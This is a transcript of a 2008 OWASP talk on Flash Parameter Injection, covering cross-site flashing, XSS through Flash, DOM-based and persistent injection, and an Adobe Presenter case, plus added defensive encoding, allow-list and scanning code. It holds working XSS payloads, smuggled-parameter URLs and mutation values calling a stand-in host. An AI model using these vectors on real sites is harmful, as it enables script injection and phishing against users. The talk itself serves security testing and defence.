
Flash Parameter Injection

Flash Parameter Injection. Ayal Yogev and Adi Sharabani, IBM Rational Application Security ({ayal, adish}). OWASP, 25/09/2008. The OWASP Foundation, http://www.owasp.org. Agenda: Flash 101, Flash Security, The Problem, Flash Parameter Injection, Real Example, Testing.


Presentation Transcript


  1. Flash Parameter Injection
  Ayal Yogev, Adi Sharabani
  IBM Rational Application Security {ayal, adish}
  OWASP, 25/09/2008
  The OWASP Foundation, http://www.owasp.org

  2. Agenda
  • Flash 101
  • Flash Security
  • The Problem
  • Flash Parameter Injection
  • Real Example
  • Testing

  3. Flash 101

  4. Background
  • Introduced in 1996
  • Adds animation and interactivity to Web pages
  • Contains a scripting language: Action Script
  • Very popular: installed in over 99% of PCs (http://www.adobe.com/products/player_census/flashplayer/)
  • Advanced technologies:
    • Flex
    • Adobe AIR

  5. Accessing Flash movies
  • Can be embedded in HTML pages:

      <body>
        <h1>My Flash Movie</h1>
        <object type="application/x-shockwave-flash">
          <param name="allowScriptAccess" value="sameDomain" />
          <param name="movie" value="movie.swf" />
          <param name="quality" value="high" />
          <param name="bgcolor" value="#ffffff" />
          <embed src="movie.swf"></embed>
        </object>
      </body>

  (Diagram: Host (Browser) holding the HTML page and the Flash Player, which runs the Flash Movie (SWF))

  6. Accessing Flash movies
  • Can be embedded in HTML pages
  • Can be accessed directly: http://host/movie.swf
  • A "dummy" HTML page may be created (browser dependent)
  • DOM access according to policy
  • Example (Firefox):

      <html>
        <body marginwidth="0" marginheight="0">
          <embed width="100%" height="100%" name="plugin" src="http://host/movie.swf" type="application/x-shockwave-flash"/>
        </body>
      </html>

  7. Global Flash Variables
  • Action Script supports Global Variables
  • Global Variables can be assigned from outside the movie
  • Common use:

      if (_root.myparam == undefined) {
          _root.myparam = "my default value";
      }

  8. Global Flash Variables
  • Action Script supports Global Variables
  • Global Variables can be assigned from outside the movie
  • Assigning Global Variables as parameters:
    • Direct Reference: http://host/movie.swf?a=5&b=hello
    • Embedded URI:

      <body>
        <object type="application/x-shockwave-flash" data="movie.swf?a=5&b=hello" width="600" height="345">
        </object>
      </body>

  9. Global Flash Variables
  • Assigning Global Variables as parameters:
    • Flash Attributes:

      <body>
        <object type="application/x-shockwave-flash" data="movie.swf" flashvars="a=5&b=hello" width="600" height="345">
        </object>
      </body>

  10. Flash Security

  11. Previous Research
  • Bypassing JavaScript Filters - the Flash! Attack, Eye on Security, August 2002
  • Misuse of Macromedia Flash Ads clickTAG Option May Lead to Privacy Breach, Scan Security Wire, April 2003
  • Testing Flash Applications, Stefano Di Paola, May 2007
  • Finding Vulnerabilities in Flash Applications, Stefano Di Paola, November 2007

  12. Controlling Global Flash Variables can result in...
  • Cross-Site Flashing
  • Cross-Site Scripting through Flash
  • Phishing
  • Flow Manipulation
  • …

  13. Cross-Site Flashing
  • A vulnerable movie is tricked into loading a malicious movie
  • The malicious movie gets access to the same sandbox
  • Can be achieved using methods like loadMovie*:

      if (_root.movieURI == undefined) {
          _root.movieURI = "http://host/movie.swf";
      }
      loadMovieNum(_root.movieURI, 1);

  • Attack Vector: http://host/movie.swf?movieURI=maliciousFile.swf

  (Diagram: Flash Player / Flash Movie / Malicious Flash)

  14. Cross-Site Scripting through Flash
  • Classic XSS using a vulnerable Flash file
  • Can be triggered by the use of global flash variables in:
    • getURL, using payload javascript:alert('XSS')
    • Load* functions, using payload asfunction:getURL,javascript:alert('XSS')
    • TextField.htmlText, using payload <img src='javascript:alert("XSS")//.jpg'>
    • ...

  15. Cross-Site Scripting through Flash (Example)
  • Consider movie.swf containing the code:

      if (_root.url == undefined) {
          _root.url = "http://host/";
      }
      getURL(_root.url);

  16-18. Normal Usage (screenshots)

  19. Cross-Site Scripting through Flash (Example)
  • Attack Vector: http://host/movie.swf?url=javascript:alert('gotcha!')

      if (_root.url == undefined) {
          _root.url = "http://host/";
      }
      getURL(_root.url);

  20-22. Cross-Site Scripting through Flash (Example) (screenshots)

  23. The Problem

  24. The Missing Link
  • Flash cannot always load without the original HTML
  • Flash movies may rely on parts of the DOM to execute:
    • Use JavaScript variables and methods
    • Use HTML DOM elements
  • Direct access to Flash may be restricted due to security

  (Diagram: two instances of Host (Browser) / Flash Player / Flash Movie (SWF))

  25-29. The Missing Link - Example (screenshots)

  30. Known examples of Flash attacks involve accessing the movie directly

  31. BUT… Some Flash movies cannot load when accessed directly

  32. FPI: Injecting global variables into Flash in its original HTML environment

  33. FPI Techniques

  34. Reflected FPI
  • Possible when the location of the Flash movie is retrieved through a URL parameter:

      # CGI: embed the Flash movie
      print '<object type="application/x-shockwave-flash" data="' . $params{movie} . '"></object>';

  • Attack example: http://host/index.cgi?movie=movie.swf?globalVar=e-v-i-l
  • Resulting HTML:

      <object type="application/x-shockwave-flash" data="movie.swf?globalVar=e-v-i-l"></object>

  35. Reflected FPI (Piggybacking FlashVars)
  • Attack possible when global flash variables are received from HTML parameters without sanitization:

      # CGI: read the 'language' parameter
      my $language = $params{language};
      # Strip double quotes only
      $language =~ s/"//g;
      # Embed the Flash movie
      print '<object type="application/x-shockwave-flash" data="movie.swf" flashvars="language=' . $language . '"></object>';

  • Attack occurs when the victim is lured to click on a link like:
    http://host/index.cgi?language=English%26globalVar=e-v-i-l
  • %26 is decoded to &, so the parameter value becomes English&globalVar=e-v-i-l
  • Resulting HTML:

      <html>
      …
      <object type="application/x-shockwave-flash" data="movie.swf" flashvars="language=English&globalVar=e-v-i-l">
      </object>
      …

  36. FlashVars Injection
  • Possible when an attribute of the object tag is received as a parameter:

      # CGI: embed the flash movie
      print "<object type='application/x-shockwave-flash' " .
            "data='movie.swf' width='" . $params{width} . "'></object>";

  • Attack vector: http://host/index.cgi?width=600%27%20flashvars=%27globalVar=e-v-i-l
  • Decoded value: 600' flashvars='globalVar=e-v-i-l
  • Resulting HTML:

      <object type='application/x-shockwave-flash' data='movie.swf' width='600' flashvars='globalVar=e-v-i-l'>
      </object>

  37. DOM Based FPI
  • document.location is used as a global Flash variable:

      <script type="text/javascript" language="JavaScript">
        var s = '';
        var loc = encodeURI(document.location);
        s += '<object>';
        s += ' <embed src="movie.swf" flashvars="location=' + loc + '">';
        s += ' </embed>';
        s += '</object>';
        document.write(s);
      </script>

  38. DOM Based FPI (continued)
  • Attack vector: http://host/index.htm#&globalVar=e-v-i-l
  • The global variable is injected into the Flash movie embedded inside the DOM:

      <object>
        <embed src="movie.swf" flashvars="location=http://host/index.htm#&globalVar=e-v-i-l">
        </embed>
      </object>

  39. DOM Based FPI (continued)
  • The JavaScript function encodeURI is not sufficient in this case:
    • Can prevent DOM based XSS but not DOM Based FPI
    • Does not encode all characters (e.g. '&', '?')
  • encodeURIComponent, escape or similar methods must be used
  • Appropriate encoding must be used (depending on context)
  • Attack is invisible to IDS and IPS: data following '#' is not sent to the server ('?' also works, but data following it is sent to the server)
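  The following is an added example, not code from the slides: it models how a flashvars string is split into global variables, and shows why stripping only quotes (slide 35) or calling encodeURI on document.location (slides 37-39) still lets a second variable ride in, while encodeURIComponent does not. The parser is an assumption about the player's splitting rules, and the sample inputs are the attack vectors from the slides.

```javascript
// Added example (not part of the OWASP slides): why stripping quotes (slide 35)
// or calling encodeURI (slides 37-39) still lets an attacker piggyback a
// global variable onto FlashVars, and why encodeURIComponent does not.
// Assumption: the Flash Player splits the flashvars string on '&' and '=' and
// percent-decodes each name and value (a model, not the real player code).
function parseFlashVars(flashvars) {
  const vars = {};
  for (const pair of flashvars.split('&')) {
    if (!pair) continue;
    const i = pair.indexOf('=');
    const name = i < 0 ? pair : pair.slice(0, i);
    const value = i < 0 ? '' : pair.slice(i + 1);
    vars[decodeURIComponent(name)] = decodeURIComponent(value);
  }
  return vars;
}

// Slide 35, server side: the CGI gets the already URL-decoded 'language'
// parameter and only removes double quotes before building flashvars.
function languageFlashVarsVulnerable(language) {
  return 'language=' + language.replace(/"/g, '');
}
// Fixed: percent-encode the value so '&' and '=' cannot begin a new variable.
function languageFlashVarsFixed(language) {
  return 'language=' + encodeURIComponent(language);
}

// Slides 37-39, client side: document.location is copied into flashvars.
// encodeURI leaves '#', '&', '?' and '=' untouched, which is the whole problem.
function locationFlashVarsVulnerable(location) {
  return 'location=' + encodeURI(location);
}
function locationFlashVarsFixed(location) {
  return 'location=' + encodeURIComponent(location);
}

// Constructed inputs taken from the attack vectors shown on the slides.
const LANGUAGE_PARAM = decodeURIComponent('English%26globalVar=e-v-i-l'); // as the CGI sees it
const DOM_LOCATION = 'http://host/index.htm#&globalVar=e-v-i-l';

// Returns the names of the global variables the movie would see in each case.
function globalsSeen() {
  return {
    reflectedVulnerable: Object.keys(parseFlashVars(languageFlashVarsVulnerable(LANGUAGE_PARAM))),
    reflectedFixed: Object.keys(parseFlashVars(languageFlashVarsFixed(LANGUAGE_PARAM))),
    domVulnerable: Object.keys(parseFlashVars(locationFlashVarsVulnerable(DOM_LOCATION))),
    domFixed: Object.keys(parseFlashVars(locationFlashVarsFixed(DOM_LOCATION))),
  };
}
```

In both fixed variants the movie still receives the full original value in its intended variable; only the ability to create a new variable is gone.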

  40. Persistent FPI
  • Shared local Flash objects (a.k.a. Flash cookies)
  • Used to store persistent data across multiple sessions and save Flash state
  • Storing shared local Flash objects:

      // Create a shared object
      mySharedObject = SharedObject.getLocal("sharedObjName");
      // Store data in the shared object
      mySharedObject.data.name = "jsmith";
      mySharedObject.data.homepage = "http://demo.testfire.net";
      // Flush
      mySharedObject.flush();

  41. Persistent FPI (continued)
  • Loading shared local Flash objects:

      // Create a new shared object or read an existing one
      mySharedObject = SharedObject.getLocal("sharedObjName");
      // Check whether variable name exists
      if (mySharedObject.data.name == null) {
          // Shared object doesn't exist
      } else {
          // Read the name
          name = mySharedObject.data.name;
          // Read the homepage
          homepage = mySharedObject.data.homepage;
      }

  42. Persistent FPI (continued)
  • Shared local Flash object is controlled by user input
  • Object is used inside the getURL method:

      // Create a new shared object or read an existing one
      mySharedObject = SharedObject.getLocal("urlToLoad");
      // Check whether there is a shared object saved
      if (mySharedObject.data.url == null) {
          // Store the URL in a shared object
          mySharedObject.data.url = _root.inputURL;
      }
      // Get the URL
      getURL(mySharedObject.data.url);

  (Diagram: Host (Browser) / Flash Player / Flash Movie, shown twice)

  43. Persistent FPI (continued)
  • After the first infection, XSS will be executed every time the movie is loaded
  • Attack can persist after the vulnerability is fixed
  • IDS or IPS will only be able to detect the initial infection
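  An added example, not from the slides: the allow-list check a movie should apply to an externally settable value before it reaches getURL or a Load* function (slides 14-19), and before it is cached in a shared local object (slide 42). It is written in JavaScript as a stand-in for the equivalent ActionScript logic; the allowed host list is a constructed assumption.

```javascript
// Added example (not from the slides): an allow-list check a movie should apply
// to an attacker-reachable value before handing it to getURL or loadMovie*
// (slides 14-19) or before caching it in a shared local object (slide 42).
// Written in JavaScript as a stand-in for the equivalent ActionScript check.
// Assumption (constructed): the application only ever needs http(s) URLs on
// the hosts listed below.
const ALLOWED_HOSTS = ['host', 'demo.testfire.net'];

function isAllowedUrl(candidate) {
  if (typeof candidate !== 'string') return false;
  // Drop control characters and spaces; lenient parsers skip them before the
  // scheme, so "java\tscript:" must not slip through as a non-javascript URL.
  const cleaned = candidate.replace(/[\u0000-\u0020]/g, '');
  let url;
  try {
    url = new URL(cleaned);          // rejects relative paths and malformed input
  } catch (e) {
    return false;
  }
  // The parser lower-cases the scheme, so "JavaScript:" is caught as well.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return false;
  return ALLOWED_HOSTS.includes(url.hostname);
}

// The pattern from slides 15/19 and 42, with the check in front of the sink:
// use the injected value only if it passes, otherwise the built-in default.
function resolveNavigationUrl(injected, fallback = 'http://host/') {
  return isAllowedUrl(injected) ? injected : fallback;
}
```

Applying the check before the value is written into the shared object (slide 42) is what stops a single injection from persisting across sessions.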

  44. Example: CVE-2008-3515, CVE-2008-3516

  45. Adobe Presenter FPI Vulnerability
  • Illustration of the automatically created HTML:

      function showFlash(swf, w, h, loop) {
        var myLocation = document.location;
        //...
        s += '<param name="FlashVars" value="' +
             'initialURL=' + myLocation + '&isMSIE=' + isMSIE + '&useBSM=false" />'
        //...
        document.write(s);
      }

  • The same function with encodeURI applied to document.location:

      function showFlash(swf, w, h, loop) {
        var myLocation = encodeURI(document.location);
        //...
        s += '<param name="FlashVars" value="' +
             'initialURL=' + myLocation + '&isMSIE=' + isMSIE + '&useBSM=false" />'
        //...
        document.write(s);
      }

  46. Adobe Presenter FPI Vulnerability (continued)
  • Movie Viewer.swf vulnerable to XSS through Flash:
    • Global parameter _url with payload "javascript:alert('XSS')"
    • Global parameter baseurl with payload "asfunction:getURL,javascript:alert('XSS')"
  • Works in Flash Player version 9,0,47,0 on both IE and Firefox
  • DOM based FPI allows the Flash to load within the original HTML:
    http://host/index.htm#&_url=javascript:alert(document.domain)
  • Invisible to IPS/IDS
  • Vendors must recompile their Flash files to fix the problem

  47. Testing

  48. Testing
  • Identify controlled Flash parameters:
    • Query parameters (from HTML)
    • FlashVars (from HTML)
    • Uninstantiated variables (from Action Script)
  • Locate potentially dangerous code:
    • Where controlled Flash parameters are used inside methods like getURL, loadMovie, etc.
  • Save sequences leading to potentially dangerous code
  • Associate with parameter

  49. Testing (continued)
  • Mutation - inject values into the parameters:
    • XSS: javascript:window.open('http://my.site')
    • XSF: http://my.site/movie.swf
    • Phishing: http://my.site
  • Validation:
    • Play relevant sequences belonging to the mutated parameter
    • Verify test results (browser events, Action Script level)
  • Test the Flash movie within its original HTML environment
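  An added example, not part of the slides: a first-pass triage over ActionScript source for the identification steps on slides 48-49. It collects the _root globals a movie reads, records whether each carries the "== undefined" default that marks it as externally settable, and reports which ones are passed to a navigation or loading sink. The regular expressions and the sample source are constructed heuristics for the patterns shown on these slides, not a real ActionScript parser.

```javascript
// Added example (not from the slides): a first-pass triage over ActionScript 2
// source for the Testing steps above: collect the _root globals a movie reads,
// note whether each has the "== undefined" default that marks it as
// externally settable, and report which ones reach a navigation/loading sink.
// Assumption: original or decompiled .as text is available; the regular
// expressions are heuristics for the patterns on these slides, not a parser.
const SINKS = ['getURL', 'loadMovie', 'loadMovieNum', 'loadVariables'];

function findFpiCandidates(source) {
  const globals = [];
  for (const m of source.matchAll(/_root\.([A-Za-z_]\w*)/g)) {
    if (!globals.includes(m[1])) globals.push(m[1]);
  }
  const findings = [];
  for (const name of globals) {
    const defaulted = new RegExp('_root\\.' + name + '\\s*==\\s*undefined').test(source);
    for (const sink of SINKS) {
      // sink( ... _root.name ... ): the global appears inside the argument list
      const call = new RegExp('\\b' + sink + '\\s*\\([^)]*_root\\.' + name + '\\b');
      if (call.test(source)) findings.push({ name, sink, defaulted });
    }
  }
  return findings;
}

// Constructed sample: the movies from slides 13 and 15 merged into one file,
// plus one global that never reaches a sink.
const SAMPLE_SOURCE = `
if (_root.movieURI == undefined) { _root.movieURI = "http://host/movie.swf"; }
loadMovieNum(_root.movieURI, 1);
if (_root.url == undefined) { _root.url = "http://host/"; }
getURL(_root.url);
var title = _root.title;
`;
```

Each finding is a parameter/sink pair to mutate and replay in the movie's original HTML environment, as slide 49 describes; a global with no sink (title above) is lower priority.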
